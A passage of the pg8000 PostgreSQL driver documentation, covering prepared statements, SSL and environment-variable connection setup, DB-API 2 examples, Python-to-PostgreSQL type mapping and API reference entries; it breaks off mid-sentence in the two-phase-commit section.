pg8000.native.TIMESTAMP})\n[[True]]\n\n----\n\n\n=== Prepared Statements\n\nhttps:\/\/www.postgresql.org\/docs\/current\/sql-prepare.html[Prepared statements]\ncan be useful in improving performance when you have a statement that's\nexecuted repeatedly. Here's an example:\n\n\n[source,python]\n----\n\n>>> # Create the prepared statement\n>>> ps = con.prepare(\"SELECT cast(:v as varchar)\")\n>>>\n>>> # Exceute the statement repeatedly\n>>> ps.run(v=\"speedy\")\n[['speedy']]\n>>> ps.run(v=\"rapid\")\n[['rapid']]\n>>> ps.run(v=\"swift\")\n[['swift']]\n>>>\n>>> # Close the prepared statement, releasing resources on the server\n>>> ps.close()\n\n----\n\n\n=== Use Environment Variables As Connection Defaults\n\nYou might want to use the current user as the database username for example:\n\n[source,python]\n----\n\n>>> import pg8000\n>>> import getpass\n>>>\n>>> # Connect to the database with current user name\n>>> username = getpass.getuser()\n>>> connection = pg8000.native.Connection(username, password=\"cpsnow\")\n>>>\n>>> connection.run(\"SELECT 'pilau'\")\n[['pilau']]\n\n----\n\nor perhaps you may want to use some of the same\nhttps:\/\/www.postgresql.org\/docs\/current\/libpq-envars.html[environment variables\nthat libpq uses]:\n\n[source,python]\n----\n\n>>> import pg8000\n>>> from os import environ\n>>>\n>>> username = environ.get('PGUSER', 'postgres')\n>>> password = environ.get('PGPASSWORD', 'cpsnow')\n>>> host = environ.get('PGHOST', 'localhost')\n>>> port = environ.get('PGPORT', '5432')\n>>> database = environ.get('PGDATABASE')\n>>>\n>>> connection = pg8000.native.Connection(\n... username, password=password, host=host, port=port, database=database)\n>>>\n>>> connection.run(\"SELECT 'Mr Cairo'\")\n[['Mr Cairo']]\n\n----\n\nIt might be asked, why doesn't pg8000 have this behaviour built in? The\nthinking follows the second aphorism of\nhttps:\/\/www.python.org\/dev\/peps\/pep-0020\/[The Zen of Python]:\n\n[quote]\nExplicit is better than implicit.\n\nSo we've taken the approach of only being able to set connection parameters\nusing the `pg8000.native.Connection()` constructor.\n\n\n=== Connect To PostgreSQL Over SSL\n\nTo connect to the server using SSL defaults do:\n\n[source,python]\n----\n\nimport pg8000.native\n\n\nconnection = pg8000.native.Connection(\n username, password=\"cpsnow\", ssl_context=True)\nconnection.run(\"SELECT 'The game is afoot!'\")\n\n----\n\nTo connect over SSL with custom settings, set the `ssl_context` parameter to\nan https:\/\/docs.python.org\/3\/library\/ssl.html#ssl.SSLContext[`ssl.SSLContext`]\nobject:\n\n[source,python]\n----\n\nimport pg8000.native\nimport ssl\n\n\nssl_context = ssl.SSLContext()\nssl_context.verify_mode = ssl.CERT_REQUIRED\nssl_context.load_verify_locations('root.pem') \nconnection = pg8000.native.Connection(\n username, password=\"cpsnow\", ssl_context=ssl_context)\n\n----\n\nIt may be that your PostgreSQL server is behind an SSL proxy server in which\ncase you can set a pg8000-specific attribute\n`ssl.SSLContext.request_ssl = False` which tells pg8000 to connect using an\nSSL socket, but not to request SSL from the PostgreSQL server:\n\n[source,python]\n----\n\nimport pg8000.native\nimport ssl\n\n\nssl_context = ssl.SSLContext()\nssl_context.request_ssl = False\nconnection = pg8000.native.Connection(\n username, password=\"cpsnow\", ssl_context=ssl_context)\n\n----\n\n\n== DB-API 2 Interactive Examples\n\nThese examples stick to the DB-API 2.0 standard.\n\n\n=== Basic Example\n\nImport pg8000, connect to the database, create a table, add some rows and then\nquery the table:\n\n[source,python]\n----\n>>> import pg8000\n>>>\n>>> conn = pg8000.dbapi.connect(user=\"postgres\", password=\"cpsnow\")\n>>> cursor = conn.cursor()\n>>> cursor.execute(\"CREATE TEMPORARY TABLE book (id SERIAL, title TEXT)\")\n>>> cursor.execute(\n... \"INSERT INTO book (title) VALUES (%s), (%s) RETURNING id, title\",\n... (\"Ender's Game\", \"Speaker for the Dead\"))\n>>> results = cursor.fetchall()\n>>> for row in results:\n... id, title = row\n... print(\"id = %s, title = %s\" % (id, title))\nid = 1, title = Ender's Game\nid = 2, title = Speaker for the Dead\n>>> conn.commit()\n\n----\n\n\n=== Query Using Fuctions\n\nAnother query, using some PostgreSQL functions:\n\n[source,python]\n----\n>>> cursor.execute(\"SELECT extract(millennium from now())\")\n>>> cursor.fetchone()\n[3.0]\n\n----\n\n\n=== Interval Type\n\nA query that returns the PostgreSQL interval type:\n\n[source,python]\n----\n>>> import datetime\n>>> cursor.execute(\"SELECT timestamp '2013-12-01 16:06' - %s\",\n... (datetime.date(1980, 4, 27),))\n>>> cursor.fetchone()\n[datetime.timedelta(days=12271, seconds=57960)]\n\n----\n\n\n=== Point Type\n\nA round-trip with a\nhttps:\/\/www.postgresql.org\/docs\/current\/datatype-geometric.html[PostgreSQL\npoint] type:\n\n[source,python]\n----\n>>> cursor.execute(\"SELECT cast(%s as point)\", ('(2.3,1)',))\n>>> cursor.fetchone()\n['(2.3,1)']\n\n----\n\n\n=== Numeric Parameter Style\n\npg8000 supports all the DB-API parameter styles. Here's an example of using\nthe 'numeric' parameter style:\n\n[source,python]\n----\n>>> pg8000.dbapi.paramstyle = \"numeric\"\n>>> cursor = conn.cursor()\n>>> cursor.execute(\"SELECT array_prepend(:1, :2)\", ( 500, [1, 2, 3, 4], ))\n>>> cursor.fetchone()\n[[500, 1, 2, 3, 4]]\n>>> pg8000.dbapi.paramstyle = \"format\"\n>>> conn.rollback()\n\n----\n\n\n=== Autocommit\n\nFollowing the DB-API specification, autocommit is off by default. It can be\nturned on by using the autocommit property of the connection.\n\n[source,python]\n----\n>>> conn.autocommit = True\n>>> cur = conn.cursor()\n>>> cur.execute(\"vacuum\")\n>>> conn.autocommit = False\n>>> cur.close()\n\n----\n\n\n=== Client Encoding\n\nWhen communicating with the server, pg8000 uses the character set that the\nserver asks it to use (the client encoding). By default the client encoding is\nthe database's character set (chosen when the database is created), but the\nclient encoding can be changed in a number of ways (eg. setting\nCLIENT_ENCODING in postgresql.conf). Another way of changing the client\nencoding is by using an SQL command. For example:\n\n[source,python]\n----\n>>> cur = conn.cursor()\n>>> cur.execute(\"SET CLIENT_ENCODING TO 'UTF8'\")\n>>> cur.execute(\"SHOW CLIENT_ENCODING\")\n>>> cur.fetchone()\n['UTF8']\n>>> cur.close()\n\n----\n\n\n=== JSON\n\nJSON is sent to the server serialized, and returned de-serialized. Here's an\nexample:\n\n[source,python]\n----\n>>> import json\n>>> cur = conn.cursor()\n>>> val = ['Apollo 11 Cave', True, 26.003]\n>>> cur.execute(\"SELECT cast(%s as json)\", (json.dumps(val),))\n>>> cur.fetchone()\n[['Apollo 11 Cave', True, 26.003]]\n>>> cur.close()\n\n----\n\n\n=== Retrieve Column Names From Results\n\nUse the columns names retrieved from a query:\n\n[source,python]\n----\n>>> import pg8000\n>>> conn = pg8000.dbapi.connect(user=\"postgres\", password=\"cpsnow\")\n>>> c = conn.cursor()\n>>> c.execute(\"create temporary table quark (id serial, name text)\")\n>>> c.executemany(\"INSERT INTO quark (name) VALUES (%s)\", ((\"Up\",), (\"Down\",)))\n>>> #\n>>> # Now retrieve the results\n>>> #\n>>> c.execute(\"select * from quark\")\n>>> rows = c.fetchall()\n>>> keys = [k[0] for k in c.description]\n>>> results = [dict(zip(keys, row)) for row in rows]\n>>> assert results == [{'id': 1, 'name': 'Up'}, {'id': 2, 'name': 'Down'}]\n\n----\n\n\n=== Notices\n\nPostgreSQL https:\/\/www.postgresql.org\/docs\/current\/static\/plpgsql-errors-and-messages.html[notices]\nare stored in a deque called `Connection.notices` and added using the\n`append()` method. Similarly there are `Connection.notifications` for\nhttps:\/\/www.postgresql.org\/docs\/current\/static\/sql-notify.html[notifications]\nand `Connection.parameter_statuses` for changes to the server configuration.\nHere's an example:\n\n[source,python]\n----\n>>> cur = conn.cursor()\n>>> cur.execute(\"LISTEN aliens_landed\")\n>>> cur.execute(\"NOTIFY aliens_landed\")\n>>> conn.commit()\n>>> conn.notifications[0][1]\n'aliens_landed'\n\n----\n\n\n=== COPY from and to a file\n\nThe SQL https:\/\/www.postgresql.org\/docs\/current\/sql-copy.html[COPY] statement\ncan be used to copy from and to a file or file-like object:\n\n[source,python]\n----\n\n>>> from io import BytesIO\n>>> #\n>>> # COPY from a stream to a table\n>>> #\n>>> stream_in = BytesIO(b'1\\telectron\\n2\\tmuon\\n3\\ttau\\n')\n>>> cur = conn.cursor()\n>>> cur.execute(\"create temporary table lepton (id serial, name text)\")\n>>> cur.execute(\"COPY lepton FROM stdin\", stream=stream_in)\n>>> #\n>>> # Now COPY from a table to a stream\n>>> #\n>>> stream_out = BytesIO()\n>>> cur.execute(\"copy lepton to stdout\", stream=stream_out)\n>>> stream_out.getvalue()\nb'1\\telectron\\n2\\tmuon\\n3\\ttau\\n'\n\n----\n\n\n== Type Mapping\n\nThe following table shows the default mapping between Python types and\nPostgreSQL types, and vice versa.\n\nIf pg8000 doesn't recognize a type that it receives from PostgreSQL, it will\nreturn it as a `str` type. This is how pg8000 handles PostgreSQL `enum` and\nXML types. It's possible to change the default mapping using adapters (see the\nexamples).\n\n.Python to PostgreSQL Type Mapping\n|===\n| Python Type | PostgreSQL Type | Notes\n\n| bool\n| bool\n|\n\n| int\n| int4\n|\n\n| str\n| text\n|\n\n| float\n| float8\n|\n\n| decimal.Decimal\n| numeric\n|\n\n| bytes\n| bytea\n|\n\n| datetime.datetime (without tzinfo)\n| timestamp without timezone\n| See note below.\n\n| datetime.datetime (with tzinfo)\n| timestamp with timezone\n| See note below.\n\n| datetime.date\n| date\n| See note below.\n\n| datetime.time\n| time without time zone\n|\n\n| datetime.timedelta\n| interval\n|\n\n| None\n| NULL\n|\n\n| uuid.UUID\n| uuid\n|\n\n| ipaddress.IPv4Address\n| inet\n|\n\n| ipaddress.IPv6Address\n| inet\n|\n\n| ipaddress.IPv4Network\n| inet\n|\n\n| ipaddress.IPv6Network\n| inet\n|\n\n| int\n| xid\n|\n\n| list of int\n| INT4[]\n|\n\n| list of float\n| FLOAT8[]\n|\n\n| list of bool\n| BOOL[]\n|\n\n| list of str\n| TEXT[]\n|\n\n| int\n| int2vector\n| Only from PostgreSQL to Python\n\n| JSON\n| json, jsonb\n| The Python JSON is provided as a Python serialized string. Results returned\n as de-serialized JSON.\n|===\n\n\n[[_theory_of_operation]]\n== Theory Of Operation\n\n{empty} +\n\n[quote, Jochen Liedtke, Liedtke's minimality principle]\n____\nA concept is tolerated inside the microkernel only if moving it outside the\nkernel, i.e., permitting competing implementations, would prevent the\nimplementation of the system's required functionality.\n____\n\n\npg8000 is designed to be used with one thread per connection.\n\nPg8000 communicates with the database using the\nhttp:\/\/www.postgresql.org\/docs\/current\/static\/protocol.html[PostgreSQL\nFrontend\/Backend Protocol] (FEBE). By default, pg8000 uses unnamed prepared\nstatements. It uses the Extended Query feature of the FEBE. So the steps are:\n\n. Query comes in.\n. Send a PARSE message to the server to create an unnamed prepared statement.\n. Send a BIND message to run against the unnamed prepared statement, resulting\n in an unnamed portal on the server.\n. Send an EXECUTE message to read all the results from the portal.\n\nIt's also possible to use named prepared statements. In which case the\nprepared statement persists on the server, and represented in pg8000 using a\nPreparedStatement object. This means that the PARSE step gets executed once up\nfront, and then only the BIND and EXECUTE steps are repeated subsequently.\n\nThere are a lot of PostgreSQL data types, but few primitive data types in\nPython. A PostgreSQL data type has to be assigned to each query parameter,\nwhich is impossible to work out in all cases. In these cases an adapter can be\nused for the parameter to indicate its type, or sometimes an\nhttps:\/\/www.postgresql.org\/docs\/current\/static\/sql-expressions.html#SQL-SYNTAX-TYPE-CASTS[explicit cast] can be used in the SQL.\n\nIn the FEBE protocol, each query parameter can be sent to the server either as\nbinary or text according to the format code. In pg8000 the parameters are\nalways sent as text.\n\n* PostgreSQL has +\/-infinity values for dates and timestamps, but Python does\n not. Pg8000 handles this by returning +\/-infinity strings in results, and in\n parameters the strings +\/- infinity can be used.\n\n* PostgreSQL dates\/timestamps can have values outside the range of Python\n datetimes. These are handled using the underlying PostgreSQL storage method.\n I don't know of any users of pg8000 that use this feature, so get in touch if\n it affects you.\n\n* Occasionally, the network connection between pg8000 and the server may go\n down. If pg8000 encounters a network problem it'll raise an `InterfaceError`\n with an error message starting with `network error` and with the original\n exception set as the\n https:\/\/docs.python.org\/3\/reference\/simple_stmts.html#the-raise-statement[cause].\n\n\n== Native API Docs\n\n=== pg8000.native.Connection(user, host='localhost', database=None, port=5432, password=None, source_address=None, unix_sock=None, ssl_context=None, timeout=None, tcp_keepalive=True, application_name=None, replication=None)\n\nCreates a connection to a PostgreSQL database.\n\nuser::\n The username to connect to the PostgreSQL server with. If your server\n character encoding is not `ascii` or `utf8`, then you need to provide\n `user` as bytes, eg. `'my_name'.encode('EUC-JP')`.\n\nhost::\n The hostname of the PostgreSQL server to connect with. Providing this\n parameter is necessary for TCP\/IP connections. One of either `host` or\n `unix_sock` must be provided. The default is `localhost`.\n\ndatabase::\n The name of the database instance to connect with. If `None` then the\n PostgreSQL server will assume the database name is the same as the username.\n If your server character encoding is not `ascii` or `utf8`, then you need to\n provide `database` as bytes, eg. `'my_db'.encode('EUC-JP')`.\n\nport::\n The TCP\/IP port of the PostgreSQL server instance. This parameter defaults\n to `5432`, the registered common port of PostgreSQL TCP\/IP servers.\n\npassword::\n The user password to connect to the server with. This parameter is optional;\n if omitted and the database server requests password-based authentication,\n the connection will fail to open. If this parameter is provided but not\n requested by the server, no error will occur. +\n +\n If your server character encoding is not `ascii` or `utf8`, then\n you need to provide `password` as bytes, eg.\n `'my_password'.encode('EUC-JP')`.\n\n\nsource_address::\n The source IP address which initiates the connection to the PostgreSQL server.\n The default is `None` which means that the operating system will choose the\n source address.\n\nunix_sock::\n The path to the UNIX socket to access the database through, for example,\n `'\/tmp\/.s.PGSQL.5432'`. One of either `host` or `unix_sock` must be provided.\n\nssl_context::\n This governs SSL encryption for TCP\/IP sockets. It can have three values:\n * `None`, meaning no SSL (the default)\n * `True`, means use SSL with an\n https:\/\/docs.python.org\/3\/library\/ssl.html#ssl.SSLContext[`ssl.SSLContext`]\n created using\n https:\/\/docs.python.org\/3\/library\/ssl.html#ssl.create_default_context[`ssl.create_default_context()`]\n * An instance of\n https:\/\/docs.python.org\/3\/library\/ssl.html#ssl.SSLContext[`ssl.SSLContext`]\n which will be used to create the SSL connection. +\n +\n If your PostgreSQL server is behind an SSL proxy, you can set the\n pg8000-specific attribute `ssl.SSLContext.request_ssl = False`, which\n tells pg8000 to use an SSL socket, but not to request SSL from the\n PostgreSQL server. Note that this means you can't use SCRAM\n authentication with channel binding.\n\ntimeout::\n This is the time in seconds before the connection to the server will time\n out. The default is `None` which means no timeout.\n\ntcp_keepalive::\n If `True` then use\n https:\/\/en.wikipedia.org\/wiki\/Keepalive#TCP_keepalive[TCP keepalive]. The\n default is `True`.\n\napplication_name::\n Sets the https:\/\/www.postgresql.org\/docs\/current\/runtime-config-logging.html#GUC-APPLICATION-NAME[application_name]. If your server character encoding is not\n `ascii` or `utf8`, then you need to provide values as bytes, eg.\n `'my_application_name'.encode('EUC-JP')`. The default is `None` which means\n that the server will set the application name.\n\nreplication::\n Used to run in https:\/\/www.postgresql.org\/docs\/12\/protocol-replication.html[streaming replication mode].\n If your server character encoding is not `ascii` or `utf8`, then you need to\n provide values as bytes, eg. `'database'.encode('EUC-JP')`.\n\n\n=== pg8000.native.Error\n\nGeneric exception that is the base exception of the other error exceptions.\n\n\n=== pg8000.native.InterfaceError\n\nFor errors that originate within pg8000.\n\n\n=== pg8000.native.DatabaseError\n\nFor errors that originate from the server.\n\n=== pg8000.native.Connection.notifications\n\nA deque of server-side\nhttps:\/\/www.postgresql.org\/docs\/current\/sql-notify.html[notifications] received\nby this database connection (via the LISTEN \/ NOTIFY PostgreSQL commands). Each\nlist item is a three-element tuple containing the PostgreSQL backend PID that\nissued the notify, the channel and the payload.\n\n\n=== pg8000.native.Connection.notices\n\nA deque of server-side notices received by this database connection.\n\n\n=== pg8000.native.Connection.parameter_statuses\n\nA deque of server-side parameter statuses received by this database connection.\n\n\n=== pg8000.native.Connection.run(sql, stream=None, types=None, **kwargs)\n\nExecutes an sql statement, and returns the results as a `list`. For example:\n\n`con.run(\"SELECT * FROM cities where population > :pop\", pop=10000)`\n\nsql::\n The SQL statement to execute. Parameter placeholders appear as a `:` followed\n by the parameter name.\n\nstream::\n For use with the PostgreSQL\nhttp:\/\/www.postgresql.org\/docs\/current\/static\/sql-copy.html[COPY] command. For\na `COPY FROM` the parameter must be a readable file-like object, and for\n`COPY TO` it must be writable.\n\ntypes::\n A dictionary of oids. A key corresponds to a parameter. \n\nkwargs::\n The parameters of the SQL statement.\n\n\n=== pg8000.native.Connection.row_count\n\nThis read-only attribute contains the number of rows that the last `run()`\nmethod produced (for query statements like `SELECT`) or affected (for\nmodification statements like `UPDATE`.\n\nThe value is -1 if:\n\n* No `run()` method has been performed yet.\n* There was no rowcount associated with the last `run()`.\n* Using a `SELECT` query statement on a PostgreSQL server older than version\n 9.\n* Using a `COPY` query statement on PostgreSQL server version 8.1 or older.\n\n\n=== pg8000.native.Connection.columns\n\nA list of column metadata. Each item in the list is a dictionary with the\nfollowing keys:\n\n* name\n* table_oid\n* column_attrnum\n* type_oid\n* type_size\n* type_modifier\n* format\n\n\n=== pg8000.native.Connection.close()\n\nCloses the database connection.\n\n\n=== pg8000.native.Connection.register_out_adapter(typ, oid, out_func)\n\nRegister a type adapter for types going out from pg8000 to the server.\n\ntyp::\n The Python class that the adapter is for.\n\noid::\n The PostgreSQL type identifier found in the\n https:\/\/www.postgresql.org\/docs\/current\/catalog-pg-type.html[pg_type system\n calalog].\n\nout_func::\n A function that takes the Python object and returns its string representation\n in the format that the server requires.\n\n\n=== pg8000.native.Connection.register_in_adapter(oid, in_func)\n\nRegister a type adapter for types coming in from the server to pg8000.\n\noid::\n The PostgreSQL type identifier found in the\n https:\/\/www.postgresql.org\/docs\/current\/catalog-pg-type.html[pg_type system\n calalog].\n\nin_func::\n A function that takes the PostgreSQL string representation and returns\n a corresponding Python object.\n\n\n=== pg8000.native.Connection.prepare(sql)\n\nReturns a PreparedStatement object which represents a\nhttps:\/\/www.postgresql.org\/docs\/current\/sql-prepare.html[prepared statement] on\nthe server. It can subsequently be repeatedly executed as shown in the\n<<_prepared_statements, example>>.\n\nsql::\n The SQL statement to prepare. Parameter placeholders appear as a `:` followed\n by the parameter name.\n\n\n=== pg8000.native.PreparedStatement\n\nA prepared statement object is returned by the\n`pg8000.native.Connection.prepare()` method of a connection. It has the\nfollowing methods:\n\n\n=== pg8000.native.PreparedStatement.run(**kwargs)\n\nExecutes the prepared statement, and returns the results as a `tuple`.\n\nkwargs::\n The parameters of the prepared statement.\n\n\n=== pg8000.native.PreparedStatement.close()\n\nCloses the prepared statement, releasing the prepared statement held on the\nserver.\n\n\n== DB-API 2 Docs\n\n\n=== Properties\n\n\n==== pg8000.dbapi.apilevel\n\nThe DBAPI level supported, currently \"2.0\".\n\nThis property is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n==== pg8000.dbapi.threadsafety\n\nInteger constant stating the level of thread safety the DBAPI interface\nsupports. For pg8000, the threadsafety value is 1, meaning that threads may\nshare the module but not connections.\n\nThis property is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n==== pg8000.dbapi.paramstyle\n\nString property stating the type of parameter marker formatting expected by\nthe interface. This value defaults to \"format\", in which parameters are\nmarked in this format: \"WHERE name=%s\".\n\nThis property is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nAs an extension to the DBAPI specification, this value is not constant; it\ncan be changed to any of the following values:\n\nqmark::\n Question mark style, eg. `WHERE name=?`\n\nnumeric::\n Numeric positional style, eg. `WHERE name=:1`\n\nnamed::\n Named style, eg. `WHERE name=:paramname`\n\nformat::\n printf format codes, eg. `WHERE name=%s`\n\npyformat::\n Python format codes, eg. `WHERE name=%(paramname)s`\n\n\n==== pg8000.dbapi.STRING\n\nString type oid.\n\n==== pg8000.dbapi.BINARY\n\n\n==== pg8000.dbapi.NUMBER\n\nNumeric type oid.\n\n\n==== pg8000.dbapi.DATETIME\n\nTimestamp type oid\n\n\n==== pg8000.dbapi.ROWID\n\nROWID type oid\n\n\n=== Functions\n\n==== pg8000.dbapi.connect(user, host='localhost', database=None, port=5432, password=None, source_address=None, unix_sock=None, ssl_context=None, timeout=None, tcp_keepalive=True, application_name=None, replication=None)\n\nCreates a connection to a PostgreSQL database.\n\nThis property is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nuser::\n The username to connect to the PostgreSQL server with. If your server\n character encoding is not `ascii` or `utf8`, then you need to provide\n `user` as bytes, eg. `'my_name'.encode('EUC-JP')`.\n\nhost::\n The hostname of the PostgreSQL server to connect with. Providing this\n parameter is necessary for TCP\/IP connections. One of either `host` or\n `unix_sock` must be provided. The default is `localhost`.\n\ndatabase::\n The name of the database instance to connect with. If `None` then the\n PostgreSQL server will assume the database name is the same as the username.\n If your server character encoding is not `ascii` or `utf8`, then you need to\n provide `database` as bytes, eg. `'my_db'.encode('EUC-JP')`.\n\nport::\n The TCP\/IP port of the PostgreSQL server instance. This parameter defaults\n to `5432`, the registered common port of PostgreSQL TCP\/IP servers.\n\npassword::\n The user password to connect to the server with. This parameter is optional;\n if omitted and the database server requests password-based authentication,\n the connection will fail to open. If this parameter is provided but not\n requested by the server, no error will occur. +\n +\n If your server character encoding is not `ascii` or `utf8`, then\n you need to provide `password` as bytes, eg.\n `'my_password'.encode('EUC-JP')`.\n\n\nsource_address::\n The source IP address which initiates the connection to the PostgreSQL server.\n The default is `None` which means that the operating system will choose the\n source address.\n\nunix_sock::\n The path to the UNIX socket to access the database through, for example,\n `'\/tmp\/.s.PGSQL.5432'`. One of either `host` or `unix_sock` must be provided.\n\nssl_context::\n This governs SSL encryption for TCP\/IP sockets. It can have three values:\n * `None`, meaning no SSL (the default)\n * `True`, means use SSL with an\n https:\/\/docs.python.org\/3\/library\/ssl.html#ssl.SSLContext[`ssl.SSLContext`]\n created using\n https:\/\/docs.python.org\/3\/library\/ssl.html#ssl.create_default_context[`ssl.create_default_context()`]\n * An instance of\n https:\/\/docs.python.org\/3\/library\/ssl.html#ssl.SSLContext[`ssl.SSLContext`]\n which will be used to create the SSL connection. +\n +\n If your PostgreSQL server is behind an SSL proxy, you can set the\n pg8000-specific attribute `ssl.SSLContext.request_ssl = False`, which\n tells pg8000 to use an SSL socket, but not to request SSL from the\n PostgreSQL server. Note that this means you can't use SCRAM\n authentication with channel binding.\n\ntimeout::\n This is the time in seconds before the connection to the server will time\n out. The default is `None` which means no timeout.\n\ntcp_keepalive::\n If `True` then use\n https:\/\/en.wikipedia.org\/wiki\/Keepalive#TCP_keepalive[TCP keepalive]. The\n default is `True`.\n\napplication_name::\n Sets the https:\/\/www.postgresql.org\/docs\/current\/runtime-config-logging.html#GUC-APPLICATION-NAME[application_name]. If your server character encoding is not\n `ascii` or `utf8`, then you need to provide values as bytes, eg.\n `'my_application_name'.encode('EUC-JP')`. The default is `None` which means\n that the server will set the application name.\n\nreplication::\n Used to run in https:\/\/www.postgresql.org\/docs\/12\/protocol-replication.html[streaming replication mode].\n If your server character encoding is not `ascii` or `utf8`, then you need to\n provide values as bytes, eg. `'database'.encode('EUC-JP')`.\n\n\n==== pg8000.dbapi.Date(year, month, day)\n\nConstuct an object holding a date value.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: `datetime.date`\n\n\n==== pg8000.dbapi.Time(hour, minute, second)\n\nConstruct an object holding a time value.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: `datetime.time`\n\n\n==== pg8000.dbapi.Timestamp(year, month, day, hour, minute, second)\n\nConstruct an object holding a timestamp value.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: `datetime.datetime`\n\n\n==== pg8000.dbapi.DateFromTicks(ticks)\n\nConstruct an object holding a date value from the given ticks value (number of\nseconds since the epoch).\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: `datetime.datetime`\n\n\n==== pg8000.dbapi.TimeFromTicks(ticks)\n\nConstruct an objet holding a time value from the given ticks value (number of\nseconds since the epoch).\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: `datetime.time`\n\n\n==== pg8000.dbapi.TimestampFromTicks(ticks)\n\nConstruct an object holding a timestamp value from the given ticks value\n(number of seconds since the epoch).\n\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: `datetime.datetime`\n\n\n==== pg8000.dbapi.Binary(value)\n\nConstruct an object holding binary data.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: `bytes`.\n\n\n=== Generic Exceptions\n\nPg8000 uses the standard DBAPI 2.0 exception tree as \"generic\" exceptions.\nGenerally, more specific exception types are raised; these specific exception\ntypes are derived from the generic exceptions.\n\n==== pg8000.dbapi.Warning\n\nGeneric exception raised for important database warnings like data truncations.\nThis exception is not currently used by pg8000.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n==== pg8000.dbapi.Error\n\nGeneric exception that is the base exception of all other error exceptions.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n==== pg8000.dbapi.InterfaceError\n\nGeneric exception raised for errors that are related to the database interface\nrather than the database itself. For example, if the interface attempts to use\nan SSL connection but the server refuses, an InterfaceError will be raised.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n==== pg8000.dbapi.DatabaseError\n\nGeneric exception raised for errors that are related to the database. This\nexception is currently never raised by pg8000.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n==== pg8000.dbapi.DataError\n\nGeneric exception raised for errors that are due to problems with the processed\ndata. This exception is not currently raised by pg8000.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n==== pg8000.dbapi.OperationalError\n\nGeneric exception raised for errors that are related to the database's\noperation and not necessarily under the control of the programmer. This\nexception is currently never raised by pg8000.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n==== pg8000.dbapi.IntegrityError\n\nGeneric exception raised when the relational integrity of the database is\naffected. This exception is not currently raised by pg8000.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n==== pg8000.dbapi.InternalError\n\nGeneric exception raised when the database encounters an internal error. This\nis currently only raised when unexpected state occurs in the pg8000 interface\nitself, and is typically the result of a interface bug.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n==== pg8000.dbapi.ProgrammingError\n\nGeneric exception raised for programming errors. For example, this exception\nis raised if more parameter fields are in a query string than there are\navailable parameters.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n==== pg8000.dbapi.NotSupportedError\n\nGeneric exception raised in case a method or database API was used which is not\nsupported by the database.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n=== Classes\n\n\n==== pg8000.dbapi.Connection\n\nA connection object is returned by the `pg8000.connect()` function. It\nrepresents a single physical connection to a PostgreSQL database.\n\n===== pg8000.dbapi.Connection.notifications\n\nA deque of server-side\nhttps:\/\/www.postgresql.org\/docs\/current\/sql-notify.html[notifications] received\nby this database connection (via the LISTEN \/ NOTIFY PostgreSQL commands). Each\nlist item is a three-element tuple containing the PostgreSQL backend PID that\nissued the notify, the channel and the payload.\n\nThis attribute is not part of the DBAPI standard; it is a pg8000 extension.\n\n\n===== pg8000.dbapi.Connection.notices\n\nA deque of server-side notices received by this database connection.\n\nThis attribute is not part of the DBAPI standard; it is a pg8000 extension.\n\n\n===== pg8000.dbapi.Connection.parameter_statuses\n\nA deque of server-side parameter statuses received by this database connection.\n\nThis attribute is not part of the DBAPI standard; it is a pg8000 extension.\n\n\n===== pg8000.dbapi.Connection.autocommit\n\nFollowing the DB-API specification, autocommit is off by default. It can be\nturned on by setting this boolean pg8000-specific autocommit property to True.\n\nNew in version 1.9.\n\n\n===== pg8000.dbapi.Connection.close()\n\nCloses the database connection.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Connection.cursor()\n\nCreates a `pg8000.Cursor` object bound to this connection.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Connection.rollback()\n\nRolls back the current database transaction.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Connection.tpc_begin(xid)\n\nBegins a TPC transaction with the given transaction ID xid. This method should\nbe called outside of a transaction (i.e. nothing may have executed since the\nlast `commit()` or `rollback()`. Furthermore, it is an error to call\n`commit()` or `rollback()` within the TPC transaction. A 